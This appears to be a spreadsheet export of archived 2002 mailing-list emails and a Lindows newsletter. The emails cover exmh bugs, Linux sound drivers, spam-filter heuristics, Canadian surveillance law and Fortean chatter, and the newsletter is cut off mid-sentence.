    <t>--==_Exmh_-695600198P Content-Type: text/plain; charset=us-ascii &gt; From:  Robert Elz  &gt; Date:  Wed, 28 Aug 2002 21:06:30 +0700 &gt; &gt; It may be that your new sequence method just exposed the bug that had been &gt; there all along. *grin*  That's what the past 3 or 4 months of exmh hacking has been all about  for me. I've now stabilized everything pretty well for my paid job, so I'll probably  poke around at the sequences performance issues, but rather than checking  changes in, I'll email anything I figure out since I'm leaving town in less  than 48 hours. Chris --  Chris Garrigues                 [URL]http://www.DeepEddy.Com[/URL] virCIO                          [URL]http://www.virCIO.Com[/URL] 716 Congress, Suite 200 Austin, TX  78701		+1 512 374 0500   World War III:  The Wrong-Doers Vs. the Evil-Doers. --==_Exmh_-695600198P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Exmh version 2.2_20000822 06/23/2000 iD8DBQE9bNyqK9b4h5R0IUIRAl7bAJ9ZjEqTQ4/rok/bB4bhULQSSqUADACdGdHI egb2mI4CHykNVjHsUq07F3s= =gxds -----END PGP SIGNATURE----- --==_Exmh_-695600198P-- _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: zzzzteana@yahoogroups.com\nFrom: Robin Hill &lt;robin.hill@baesystems.com&gt;\nDate: Wed, 28 Aug 2002 09:17:20 +0000</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 09:17:20 +0000</t>
  </si>
  <si>
    <t>Robin Hill &lt;robin.hill@baesystems.com&gt;</t>
  </si>
  <si>
    <t>[zzzzteana] re: Steam</t>
  </si>
  <si>
    <t>On Tue, 27 Aug 2002 10:15:36 -0500 (EST) Jay Lake  wrote: &gt;Second, one could make the assumption that ancient or future civilizations &gt;would not be hydrocarbon based. There are alternative fuel sources, &gt;including seabed methane, biomass and all the usual suspects -- solar, &gt;hydro etc. Some of these could be exploited on a decidedly low-tech (ie, &gt;emergent civilization) basis. However, it is difficult to conceive of an &gt;industrial civilization that doesn't employ wheels, axles and bearings, &gt;all of which require lubrication. I'm not an engineer (Robin, anyone?) but &gt;it's my understanding that vegetable lubrication breaks down under stress, &gt;and that oil or graphite lubricants are the only reasonable choices for &gt;high temperature/high rotation applications, at least prior to extremely &gt;advanced modes of chemical synthesis. This is a good point. There are a lot of alternatives to hydrocarbon products derived from petroleum, but these have often been developed as a replacement for petroleum after the technology has been established - there is a growing industry in plant-derived plastics and lubricants, but this is to replicate materials that have been previously created  much more easily within the petrochemical industry. Vegetable-derived lubricants have been used. The Russians used sunflower oil in the lubrication systems of tanks and trucks during the second world  war, and work is being done in the UK to produce diesel fuel derived from waste cooking oil from fast-food restaurants.  Jay's correct in his opinion that vegetable oil is not as durable as  petroleum oil, but this is only because of the lack of sophistication  of the chemistry involved. Synthetic fuels and lubricants are continuously being developed, and I don't see any problems with synthetics ultimately  matching the performance of the more conventional products. As the rock oil runs out, plant oil derivatives *will* be developed to fill the gap. In parallel, changes will occur in the designs of the machines to  cope with any changes in performance of the lubricants. My big concern is if the technology were ever to be lost for some reason. Re-creating a petrochemical industry from scratch without petrochemicals (that is, going immediately to plant-based synthetics) would be extremely  difficult, especially if it were necessary to recreate *all* of the petrochemical-derived products (not just lubricants and fuels). I suspect that, bearing in mind the ingenuity of the human race, it would happen, just at a different pace. Imagine an industrial revollution based on, for example, methane from pig manure, or diesel oil from sunflowers. All we would then have to do is get used to all the machines smelling like pig farms and fish and chip shops... Robin Hill, STEAMY BESS, Brough, East Yorkshire ******************************************************************** This email and any attachments are confidential to the intended recipient and may also be privileged. If you are not the intended recipient please delete it from your system and notify the sender. You should not copy it or use it for any purpose nor disclose or distribute its contents to any other person. ******************************************************************** ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt; 4 DVDs Free +s&amp;p Join Now [URL]http://us.click.yahoo.com[/URL] ---------------------------------------------------------------------~-&gt; To unsubscribe from this group, send an email to: forteana-unsubscribe@egroups.com   Your use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: spamassassin-devel@example.sourceforge.net\nFrom: bugzilla-daemon@hughes-family.org\nDate: Wed, 28 Aug 2002 09:15:57 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 09:15:57 -0700 (PDT)</t>
  </si>
  <si>
    <t>bugzilla-daemon@hughes-family.org</t>
  </si>
  <si>
    <t>spamassassin-devel@example.sourceforge.net</t>
  </si>
  <si>
    <t>[SAdev] [Bug 777] tests to find hand-written HTML</t>
  </si>
  <si>
    <t>[URL]http://www.hughes-family.org[/URL] ------- Additional Comments From daniel@roe.ch  2002-08-28 09:15 ------- 3. usage of  just like  (ie. without ) which is obsolete    (not sure whether some mailers still produce such broken html) 4. tag argument values sometimes enclosed in "", sometimes not 5. colour args without # in front of hex rgb code 6. colour args with non-6-digit rgb code (typo) 7. onMouseOver et al in nonconsistent case throughout the document Mind, those are just ideas. I'm pretty sure some or even most of them are not working in practice, but they might be worth checking out. ------- You are receiving this mail because: ------- You are on the CC list for the bug, or are watching someone who is. ------------------------------------------------------- This sf.net email is sponsored by: Jabber - The world's fastest growing  real-time communications platform! Don't just IM. Build it in!  [URL]http://www.jabber.com[/URL] _______________________________________________ Spamassassin-devel mailing list Spamassassin-devel@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://www.hughes-family.org http://www.jabber.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: "John P. Looney" &lt;valen@tuatha.org&gt;\nDate: Wed, 28 Aug 2002 09:11:21 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 09:11:21 +0100</t>
  </si>
  <si>
    <t>On Tue, Aug 27, 2002 at 11:38:00PM +0100, Vincent Cunniffe mentioned:\n&gt; There is absolutely no way to use a conventional 3.5" drive with a\n&gt; laptop directly. However, you can get an external firewire or USB\n&gt; cradle and attach it to the laptop like that, and any 3.5" drive\n&gt; will work in that case.\n\n Ah, they told me that about my A1200. Just got a video box, cut air holes\nand a hole for the cables, then got an extra-long 2.5" to 3.5" IDE cable,\nand connected it up. Had to make a few holes in the A1200 case for the\nIDE cable too.\n\n Worked a charm. Until I dropped the disk one day onto concrete.\n\nKate\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: Brent Welch &lt;welch@panasas.com&gt;\nFrom: Robert Elz &lt;kre@munnari.OZ.AU&gt;\nDate: Wed, 28 Aug 2002 09:04:20 +0700</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 09:04:20 +0700</t>
  </si>
  <si>
    <t>Date:        Tue, 27 Aug 2002 18:08:12 -0700     From:        Brent Welch      Message-ID:  &lt;200208280108.VAA30178@blackcomb.panasas.com&gt;   | If we are allowed to assume 8.2 or higher, which we can't really, then   | we could add [...]   | to the SelectTypein procedure. Yes, I looked at "fixing" it there, but that code is really quite general, with almost no understanding of what anything means, so I didn't think that corrupting it with knowlwedge of the semantics of what it is fetching would really be the best thing to do. I ran out of time last night while looking for a better place for a similar check (I would have gone directly to the regexp - I'm not that up to date with all the latest tcl changes...) and I'm not sure I will have time today, but I will keep looking. kre _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: zzzzteana@yahoogroups.com\nFrom: Stewart Smith &lt;Stewart.Smith@ee.ed.ac.uk&gt;\nDate: Wed, 28 Aug 2002 09:02:46 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 09:02:46 +0100</t>
  </si>
  <si>
    <t>Re: [zzzzteana] The Coming Firestorm</t>
  </si>
  <si>
    <t>&gt; So now Osama bin Laden is Hitler. And Saddam Hussein is Hitler. And\n&gt; George Bush is fighting the Nazis. \n\nSomeone should shout "Godwin!" at him at a press conference.  Then he'd have to \nshut up.  Or does that only work on Usenet?\n\nStew\n-- \nStewart Smith\nScottish Microelectronics Centre, University of Edinburgh.\n[URL]http://www.ee.ed.ac.uk[/URL]\n\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: zzzzteana@yahoogroups.com\nFrom: Stewart Smith &lt;Stewart.Smith@ee.ed.ac.uk&gt;\nDate: Wed, 28 Aug 2002 08:59:07 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 08:59:07 +0100</t>
  </si>
  <si>
    <t>Re: [zzzzteana] Illusionist emerges after 24 hours underwater</t>
  </si>
  <si>
    <t>&gt; An illusionist has emerged after 24 hours underwater in a case in New York's\n&gt; Times Square.\n\nI'd just like to recommend the newest Viz to ukers just for the hilarious "David \nBlaine: Stalag Magician".  The ego'd one is in a WWII prison camp and sort of \ntrying to escape.  Several times he seems to have escaped and the british \nofficers celebrate before it's revealed he's been buried alive or hiding in a \nfreezer.  At one point he's asked why and says "Well it's not for publicity" \nCracking stuff.\n\nStew\n-- \nStewart Smith\nScottish Microelectronics Centre, University of Edinburgh.\n[URL]http://www.ee.ed.ac.uk[/URL]\n\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: David Neary &lt;dneary@wanadoo.fr&gt;\nDate: Wed, 28 Aug 2002 08:53:55 +0200</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 08:53:55 +0200</t>
  </si>
  <si>
    <t>Philip Reynolds wrote:\n&gt; Inn Share's [shareinnn@yahoo.com] 22 lines of wisdom included:\n&gt; &gt; \n&gt; &gt; Hi,all:\n&gt; &gt; \n&gt; &gt; Does anyone know how to list the biggest file in my\n&gt; &gt; root directory?or the second biggest ..etc...\n&gt; &gt; \n&gt; &gt; Because I want to find out what is the reason cause my\n&gt; &gt; root all most full.\n&gt; \n&gt; $ find /dir -name \*  | xargs du -s | sort -n\n&gt; \n&gt; Smallest files are listed first with the largest at the end. So if\n&gt; you want to get the 5 largest files, pipe through tail.\n\nAdding -r to the sort options, and piping through head instead,\nmight be a better idea. tail needs to read teh whole buffer, head\nonly reads the first n lines.\n\nCheers,\nDave.\n\n-- \n       David Neary,\n    Marseille, France\n  E-Mail: bolsh@gimp.org\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: zzzzteana@yahoogroups.com\nFrom: "timothy_hodkinson" &lt;mephistopheles29@hotmail.com&gt;\nDate: Wed, 28 Aug 2002 08:45:25 -0000</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 08:45:25 -0000</t>
  </si>
  <si>
    <t>"timothy_hodkinson" &lt;mephistopheles29@hotmail.com&gt;</t>
  </si>
  <si>
    <t>[zzzzteana] Crop Idol: Crop circle competition</t>
  </si>
  <si>
    <t>&gt;&gt;From todays Sun:\n[URL]http://www.thesun.co.uk[/URL],,5-2002392050,00.html\n\nYour vote on Crop Idol \nBy OLIVER HARVEY\n\nWELCOME to Crop Idol  your chance to choose Britain's most out-of-this-wor=\nld corn circle. \n\n\nThe intricate patterns, which some say are the work of aliens, are big news=\n again thanks to the spooky new Mel Gibson film Signs.\n\n\nNine of the best are shown on the right. You can vote for your favourite by=\n clicking on the image and dialling the number shown beneath.\n\nCalls cost only 10p, or 12 cents from the Republic of Ireland (though it ma=\ny be a bit more if you contact us from other planets).\n\nLines close at 6pm today. We will reveal the\nwinner tomorrow.\n\n\nAliens ... or hoaxers?\nTHE debate continues to rage over the origin of crop circles.\n\nMany believe they are simply the work of human hoaxers  while others are c=\nonvinced they are made by aliens trying to communicate with us.\n\nCrop circle enthusiasts insist that some of the designs appear so quickly a=\nnd on such a vast scale that it is impossible for humans to have made them. =\n\n\nWitnesses even claim to have seen balls of light moving through the fields =\non the nights that circles appear.\n\nResearchers have found connections between some patterns and symbols from a=\nncient religions, mathematics and even music. \n\nCrop circles were first spotted in Britain in the early 1970s and now appea=\nr throughout the world. The weird outlines are still most common in the sout=\nh of England.\n\nTheories about their cause include whirlwinds  known to circle experts as =\nplasma vortexes  earth energies from ley lines or even forces from the huma=\nn mind.\n\nIn the past the circles have also been blamed on mating roe deer, hedgehogs=\n, helicopters and holes in the ozone layer.\n\nRaymond Cox, Chairman of the Centre for Crop Circle Studies, said last nigh=\nt: "It's a great unsolved mystery.\n\n"We know not all crop circles are created by humans but we cannot say for s=\nure what is making them."\n\nPlus lots of photos\n\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>http://www.thesun.co.uk http://us.click.yahoo.com http://docs.yahoo.com</t>
  </si>
  <si>
    <t>To: spamassassin-talk@example.sourceforge.net\nFrom: Jeremy Mates &lt;yyyyates@sial.org&gt;\nDate: Wed, 28 Aug 2002 08:06:14 -0700</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 08:06:14 -0700</t>
  </si>
  <si>
    <t>Jeremy Mates &lt;yyyyates@sial.org&gt;</t>
  </si>
  <si>
    <t>[SAtalk] Re: Too funny</t>
  </si>
  <si>
    <t>* Steve Thomas  [2002-08-28T07:52-0700]: &gt; I also get a lot of them. I think they're using the domain registry &gt; database to pull their victims' addresses.  Along with the usual webmaster@* and probably a dash of web harvesting on the side from the ones I have seen. A recent conversation in two lines: Me:  Okay, trafficmagnet is being access mapped off now. Junior admin [catching up on email after conference]: Thank God! --  Jeremy Mates                                        [URL]http://www.sial.org[/URL] OpenPGP: 0x11C3D628  (4357 1D47 FF78 24BB 0FBF 7AA8 A846 9F86 11C3 D628) ------------------------------------------------------- This sf.net email is sponsored by: Jabber - The world's fastest growing  real-time communications platform! Don't just IM. Build it in!  [URL]http://www.jabber.com[/URL] _______________________________________________ Spamassassin-talk mailing list Spamassassin-talk@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://www.sial.org http://www.jabber.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Owen Byrne &lt;owen@permafrost.net&gt;\nDate: Wed, 28 Aug 2002 08:01:15 -0300</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 08:01:15 -0300</t>
  </si>
  <si>
    <t>Owen Byrne &lt;owen@permafrost.net&gt;</t>
  </si>
  <si>
    <t>Canadians again - something a little more substantive</t>
  </si>
  <si>
    <t>Politicians worldwide are discovering the internet - what a great tool  for fascism, once you got the laws in place to solve that whole  'anonymity' thing. Also I notice this story shows the truth - the  Canadian government is really located in Washington, DC, Ottawa is just  a branch office. Come to think of it, the last story I posted about  Canada featured the head of its military, 'speaking to us from military  HQ  in Palm Beach, Florida.' Owen ---------------------------------------------------------------------------------------------------------------------------- . *Will Canada's ISPs become spies?* By Declan McCullagh  Staff Writer, CNET News.com August 27, 2002, 12:56 PM PT [URL]http://news.com.com[/URL]  *WASHINGTON--The Canadian government is considering a proposal that  would force Internet providers to rewire their networks for easy  surveillance by police and spy agencies.* A discussion draft   released Sunday also contemplates creating a national database of every  Canadian with an Internet account, a plan that could sharply curtail the  right to be anonymous online. The Canadian government, including the Department of Justice   and Industry Canada  , wrote the 21-page blueprint as a near-final step  in a process that seeks to give law enforcement agents more authority to  conduct electronic surveillance. A proposed law based on the discussion  draft is expected to be introduced in Parliament late this year or in  early 2003. Arguing that more and more communications take place in electronic form,  Canadian officials say such laws are necessary to fight terrorism and  combat even run-of-the-mill crimes. They also claim that by enacting  these proposals, Canada will be following its obligations under the  Council of Europe's cybercrime treaty  , which the country is in the  process of considering. If the discussion draft were to become law, it would outlaw the  possession of computer viruses, authorize police to order Internet  providers to retain logs of all Web browsing for up to six months, and  permit police to obtain a search warrant allowing them to find "hidden  electronic and digital devices" that a suspect might be concealing. In  most circumstances, a court order would be required for government  agents to conduct Internet monitoring. Canada and the United States are nonvoting members of the Council of  Europe, and representatives from both countries' police agencies have  endorsed the controversial cybercrime treaty  , which has  drawn protests from human rights activists and civil liberties groups.  Of nearly 50 participating nations, only Albania has formally adopted  ,  or ratified, the treaty. Michael Geist , a professor at the  University of Ottawa who specializes in e-commerce law, says that the  justification for adopting such sweeping changes to Canadian law seems  weak. "It seems to me that the main justification they've given for all the  changes is that we want to ratify the cybercrime treaty and we need to  make changes," Geist said. "To me that's not a particularly convincing  argument. If there are new powers needed for law enforcement authority,  make that case." Geist added that "there's nothing in the document that indicates (new  powers) are needed. I don't know that there have been a significant  number of cases where police have run into problems." Probably the most sweeping change the legal blueprint contemplates is  compelling Internet providers and telephone companies to reconfigure  their networks to facilitate government eavesdropping and data-retention  orders. The United States has a similar requirement, called the  Communications Assistance for Law Enforcement Act  , but it  applies only to pre-Internet telecommunications companies. "It is proposed that all service providers (wireless, wireline and  Internet) be required to ensure that their systems have the technical  capability to provide lawful access to law enforcement and national  security agencies," according to the proposal. Companies would be  responsible for paying the costs of buying new equipment. Sarah Andrews, an analyst at the Electronic Privacy Information Center   (EPIC) who specializes in international law, says  the proposal goes beyond what the cybercrime treaty specifies. "Their  proposal for intercept capability talks about all service providers, not  just Internet providers," Andrews said. "The cybercrime treaty deals  only with computer data." EPIC opposes    the cybercrime treaty, saying it grants too much power to police and  does not adequately respect privacy rights. Another section of the proposal says the Canadian Association of Chiefs  of Police recommends "the establishment of a national database" with  personal information about all Canadian Internet users. "The  implementation of such a database would presuppose that service  providers are compelled to provide accurate and current information,"  the draft says. Gus Hosein, a visiting fellow at the London School of Economics and an  activist with Privacy International, calls the database "a dumb idea." "Immediately you have to wonder if you're allowed to use anonymous  mobile phones or whether you're allowed to connect to the Internet  anonymously," Hosein said. A representative for George Radwanski  , Canada's privacy commissioner, said  the office is reviewing the blueprint and does not "have any comments on  the paper as it stands." Comments on the proposal can be sent to la-al@justice.gc.ca   no later than Nov. 15.</t>
  </si>
  <si>
    <t>http://news.com.com</t>
  </si>
  <si>
    <t>To: &lt;spamassassin-talk@example.sourceforge.net&gt;\nFrom: "Steve Thomas" &lt;sthomas@apexvoice.com&gt;\nDate: Wed, 28 Aug 2002 07:45:18 -0700</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 07:45:18 -0700</t>
  </si>
  <si>
    <t>RE: [SAtalk] Too funny</t>
  </si>
  <si>
    <t>| \n| 0 hits here. :(\n| \n\nI also get a lot of them. I think they're using the domain registry\ndatabase to pull their victims' addresses. \n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: Jabber - The world's fastest growing \nreal-time communications platform! Don't just IM. Build it in! \n[URL]http://www.jabber.com[/URL]\n_______________________________________________\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: Robin Lynn Frank &lt;rlfrank-dated-1030938274.aa158a@paradigm-omega.com&gt;\nFrom: "Tony L. Svanstrom" &lt;tony@svanstrom.com&gt;\nDate: Wed, 28 Aug 2002 06:23:09 +0200 (CEST)</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 06:23:09 +0200 (CEST)</t>
  </si>
  <si>
    <t>"Tony L. Svanstrom" &lt;tony@svanstrom.com&gt;</t>
  </si>
  <si>
    <t>Robin Lynn Frank &lt;rlfrank-dated-1030938274.aa158a@paradigm-omega.com&gt;</t>
  </si>
  <si>
    <t>Re: [SAtalk] Re: patent on TMDA-like system</t>
  </si>
  <si>
    <t>On Tue, 27 Aug 2002 the voices made Robin Lynn Frank write: &gt; &gt; Tony Svanstrom, on SpamAssassin-talk, noted this US patent: &gt; &gt; &gt; &gt; [URL]http://appft1.uspto.gov[/URL] &gt; &gt;tml/PTO/search-adv.html&amp;r=62&amp;f=G&amp;l=50&amp;d=PG01&amp;s1=spam&amp;p=2&amp;OS=haiku&amp;RS=spam &gt; I took a bit of time to review what is on the above URL.  If I were a news &gt; editor, the headline would be: &gt; &gt; "Inventor" from country that ignores patents and copyrights, seeks patent for &gt; inventing the wheel!  The wheel is already patented in Australia; Melbourne man patents the wheel:    The sad news is that there seems to be a lot of patents (pending or not) that's for very basic/general ideas; it's the current form of "domainnapping", and it might turn uggly when people start trying to enfoce these patents. 	/Tony --  # Per scientiam ad libertatem! // Through knowledge towards freedom! # # Genom kunskap mot frihet! =*= (c) 1999-2002 tony@svanstrom.com =*= #      perl -e'print$_{$_} for sort%_=`lynx -dump svanstrom.com/t`'</t>
  </si>
  <si>
    <t>http://appft1.uspto.gov</t>
  </si>
  <si>
    <t>To: valhalla-list@spamassassin.taint.org,\nFrom: "" Angles " Puglisi" &lt;angles@aminvestments.com&gt;\nDate: Wed, 28 Aug 2002 03:28:10 +0000</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 03:28:10 +0000</t>
  </si>
  <si>
    <t>"" Angles " Puglisi" &lt;angles@aminvestments.com&gt;</t>
  </si>
  <si>
    <t>valhalla-list@spamassassin.taint.org,</t>
  </si>
  <si>
    <t>Re: ALSA (almost) made easy</t>
  </si>
  <si>
    <t>Matthias Saou (matthias@rpmforge.net) wrote*: &gt; &gt;You can also install the XMMS plugin &gt;(seems to make my XMMS segfault on exit... &gt;hmmm, but maybe it's another plugin) to listen to your good ol' mp3 &gt;files... that's it! I've an XMMS Alsa module I've been using for a while now at: [URL]http://www.dudex.net[/URL] [URL]http://www.dudex.net[/URL] [URL]http://www.dudex.net[/URL] Also there is alsaplayer rpms there too: [URL]http://www.dudex.net[/URL] [URL]http://www.dudex.net[/URL] [URL]http://www.dudex.net[/URL] [URL]http://www.dudex.net[/URL] Good luck. Both were build on an RH 7.3 box with errata current as of the date of the build. I'm running (null) RH beta now and I recall that alsa-xmms still works, I can not remember if alsaplayer needs a --rebuild. As an aside, alsaplayer is really maturing into a versitile app, I've been packaging for many releases now. I've scripted the alsa-xmms cvs build, so it's easy to spin another one if these rpms do not work on (null). -- That's "angle" as in geometry. _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://www.dudex.net http://www.dudex.net http://www.dudex.net http://www.dudex.net http://www.dudex.net http://www.dudex.net http://www.dudex.net http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Wed, 28 Aug 2002 02:00:30 +0000</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 02:00:30 +0000</t>
  </si>
  <si>
    <t>[use Perl] Stories for 2002-08-28</t>
  </si>
  <si>
    <t>use Perl Daily Newsletter\n\nIn this issue:\n    * .NET and Perl, Working Together\n\n+--------------------------------------------------------------------+\n| .NET and Perl, Working Together                                    |\n|   posted by pudge on Tuesday August 27, @09:17 (links)             |\n|   [URL]http://use.perl.org[/URL]              |\n+--------------------------------------------------------------------+\n\n[0]jonasbn writes "DevX has brought an article on the subject of [1]Perl\nand .NET and porting existing code. The teaser: Learn how CPAN Perl\nmodules can be made automatically available to the .NET framework. The\ntechnique involves providing small PerlNET mediators between Perl and\n.NET and knowing when, where, and how to modify."\n\nDiscuss this story at:\n    [URL]http://use.perl.org[/URL]\n\nLinks:\n    0. mailto:jonasbn@io.dk\n    1. [URL]http://www.devx.com[/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devx.com http://use.perl.org</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Wed, 28 Aug 2002 02:00:23 +0000</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 02:00:23 +0000</t>
  </si>
  <si>
    <t>[use Perl] Headlines for 2002-08-28</t>
  </si>
  <si>
    <t>use Perl Daily Headline Mailer\n\n.NET and Perl, Working Together\n    posted by pudge on Tuesday August 27, @09:17 (link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t>
  </si>
  <si>
    <t>To: valhalla-list@spamassassin.taint.org, RPM-List &lt;rpm-zzzlist@freshrpms.net&gt;\nFrom: Matthias Saou &lt;matthias@rpmforge.net&gt;\nDate: Wed, 28 Aug 2002 00:42:15 +0200</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 00:42:15 +0200</t>
  </si>
  <si>
    <t>valhalla-list@spamassassin.taint.org, RPM-List &lt;rpm-zzzlist@freshrpms.net&gt;</t>
  </si>
  <si>
    <t>ALSA (almost) made easy</t>
  </si>
  <si>
    <t>Hi all, I've decided at last to test the ALSA sound drivers. As usual the result is that I've spent much more time repackaging the darn thing than actually testing the functionalities or trying to hear the great sound quality people seem to think it outputs... but hey, some of you will benefit from that, right? ;-) I've got the whole thing working on a Valhalla system, but the packages should easily install or at least recompile on Enigma, Limbo/(null) and maybe others, who knows ;-) Here are quick instructions for those of you that wish to try it out : - Recompile the "alsa-driver" source rpm for your running kernel   (you can install the binary package if you're using the i686 2.4.18-10) - Install this "alsa-driver" package - Install the "alsa-libs" package - Install the "alsa-utils" package Now go to this URL and find out what you need to change in your /etc/modules.conf file to replace the default OSS driver loading : [URL]http://www.alsa-project.org[/URL] (very complete and very good documentation!) Hopefully you'll see that your card *is* supported ;-) Reboot, or remove by hand your current sound modules (you'll probably need to stop many applications to free the sound resource...) "by hand" and insert the new ones. If all is well you've got ALSA working! ("dmesg" to check is a good idea), you now just need to adjust the volume levels with e.g. aumix and alsamixer because everything is muted by default. With "aplay" you can already test files to see if you hear anything. You can also install the XMMS plugin (seems to make my XMMS segfault on exit... hmmm, but maybe it's another plugin) to listen to your good ol' mp3 files... that's it! It really isn't complicated, and has never been from what I see. The only thing I disliked was to have to install from source... but as I can't imagine myself doing that ;-) I've repackaged everything cleanly. Even the /dev entries are included in the rpm package (and *not* created by an ugly %post script, I insist!) and seamlessly integrate into the /etc/makedev.d structure. There are also a few other noticeable differences with the default provided ALSA spec files, for example I've split alsa-lib's development files into an alsa-lib-devel package and included static libraries... there are others of course (oh yes, the kernel version against which the "alsa-driver" package is compiled gets neatly integrated in the rpm release, so does the architecture!). I'm open to any comments or suggestions about these packages! Download : [URL]http://ftp.freshrpms.net[/URL] Current spec files : [URL]http://freshrpms.net[/URL] [URL]http://freshrpms.net[/URL] [URL]http://freshrpms.net[/URL] (All others, patches etc. : [URL]http://freshrpms.net[/URL] ) Matthias PS: As an extra bonus, I've also recompiled xine with alsa support! Simply run "xine -A alsa09" and off you go! It may even support 5.1 and S/PDIF ;-) --  Clean custom Red Hat Linux rpm packages : [URL]http://freshrpms.net[/URL] Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10 Load : 0.57 0.42 0.42, AC on-line, battery charging: 29% (1:55) _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://www.alsa-project.org http://ftp.freshrpms.net http://freshrpms.net http://freshrpms.net http://freshrpms.net http://freshrpms.net http://freshrpms.net http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: Xxxxxxxxx.Yyyyyyy@web.de\nFrom: "Michael Robertson" &lt;michaelr@lindows.com&gt;\nDate: Wed, 26 Jun 2002 16:34:04 -0800</t>
  </si>
  <si>
    <t>Wed, 26 Jun 2002 16:34:04 -0800</t>
  </si>
  <si>
    <t>"Michael Robertson" &lt;michaelr@lindows.com&gt;</t>
  </si>
  <si>
    <t>Xxxxxxxxx.Yyyyyyy@web.de</t>
  </si>
  <si>
    <t>Lindows.com: Michael's Minute: Lindows.com Report Card</t>
  </si>
  <si>
    <t>------=_LINDOWS_1890362a5620f32f969ae58b8fe2ef84 Content-Type: text/plain; 	charset="us-ascii" Content-Transfer-Encoding: 7bit If this message is not displaying properly, click  here to launch it in your browser.   Michael's Minute:  Lindows.com Report Card  As summer arrives, many school children are coming home with their report cards.  I thought this would be a good time to see what kind of grades Lindows.com received for their first 9 months in operation..   To view the Timeline of Lindows.com's first 9 months in business, click here  .  Operating System:   As of last week, consumers can experience LindowsOS in one of two ways. One way is to buy a computer running LindowsOS from Walmart.com  , for as little as $299. This is a significant milestone for us, as we've partnered with our first builder (Microtel) and retailer (Walmart). These computers work great out of the box and are ideal for general purpose computing tasks.  For those who already have a computer and also wish to try LindowsOS, we offer the Insider program  . This gives people wanting early access to LindowsOS a chance to try out LindowsOS as it develops. Currently, Insiders report installation success about 80%  of the time on their PCs. Therefore we have some room to grow, consequently, this product is not yet for everyone.  Some may wonder how we can sell a computer at Walmart  when the program available directly from Lindows.com is billed as not completely ready. The difference is the Walmart   computers are certified, ensuring that all components  work elegantly with LindowsOS. That's much different than offering a software program that will work on any computer in the world - that's very difficult. It's the difference between making a single pair of shoes for a known foot size versus opening a shoe store with every style of shoe for every size foot. The first one is easy, the second one is a much bigger job. While the installer is fantastically easy and fast (the entire OS installs in under 5 minutes), we've got a lot more work to do to support a wider range of hardware, printers and other devices. Grade:  B   _____   Software:  Our goal to give people choice means giving them choice not just on their operating system, but access to all the programs they'll want to add to their computer to really make it work for them in their school, home or 